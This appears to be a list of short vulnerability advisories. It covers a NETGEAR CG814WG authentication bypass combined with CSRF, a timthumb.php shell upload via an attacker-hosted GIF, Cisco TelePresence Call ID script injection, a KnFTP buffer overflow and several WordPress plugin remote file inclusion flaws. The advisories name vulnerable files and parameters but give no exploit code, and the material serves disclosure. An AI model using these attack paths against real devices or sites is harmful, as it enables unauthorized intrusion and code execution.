The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's as customer premises equipment within Australia and abroad. It is a centrally managed ISP solution whereby each ISP's devices run a customised firmware and configuration changes and updates can be pushed out as required. Basic authentication is used as the primary and only authentication mechanism for the administrator interface on the device. The basic authentication can be bypassed by sending a valid POST request to the device without sending any authentication header. The response from the device sends the user to another page that requests basic authentication, however at this point the request has already been processed. An example of attacks using the basic authentication bypass may include changing the admin password or enabling the remote admin interface (Internet facing). Additionally, due to the lack of CSRF protection in the web application, the bypass attack can be coupled with CSRF to have a victim enable the remote admin interface to the Internet, where an attacker can then use the bypass attack again across the remote admin interface to reset the admin password and access the device. This attack is possible when targeting a victim who is logged into the device.
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML/JavaScript/URL value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML/JavaScript/URL will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input.
KnFTP 1.0.0 Server is vulnerable to a remote buffer overflow exploit when sending a specially crafted 'USER' command. An attacker can exploit this vulnerability to execute arbitrary code on the target system.
The Relocate Upload Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious request to the relocate-upload.php script with a crafted URL containing an arbitrary file path in the 'abspath' parameter. This allows the attacker to execute arbitrary code on the vulnerable server.
The Mini Mail Dashboard Widget Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious POST request to the wp-mini-mail.php file with an 'abspath' parameter containing a URL pointing to a malicious file. This will allow the attacker to execute arbitrary code on the vulnerable server.
The Zingiri Web Shop Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. The vulnerable code is located in the init.inc.php file, which is used to initialize the plugin. The code is vulnerable to RFI because it does not properly validate user-supplied input, allowing an attacker to include a malicious file from a remote server.
The Mailing List Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. By sending a specially crafted HTTP request, an attacker can include a remote file, such as a malicious PHP script, on the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
The Disclosure Policy Plugin Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious request to the action.php file with a crafted URL containing an RFI payload. This payload can be used to execute arbitrary code on the vulnerable server.
The Livesig Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious POST request to the livesig-ajax-backend.php file, which includes the 'wp-root' parameter. This parameter is used to include a remote file, which can be used to execute arbitrary code on the server.
Services By CQR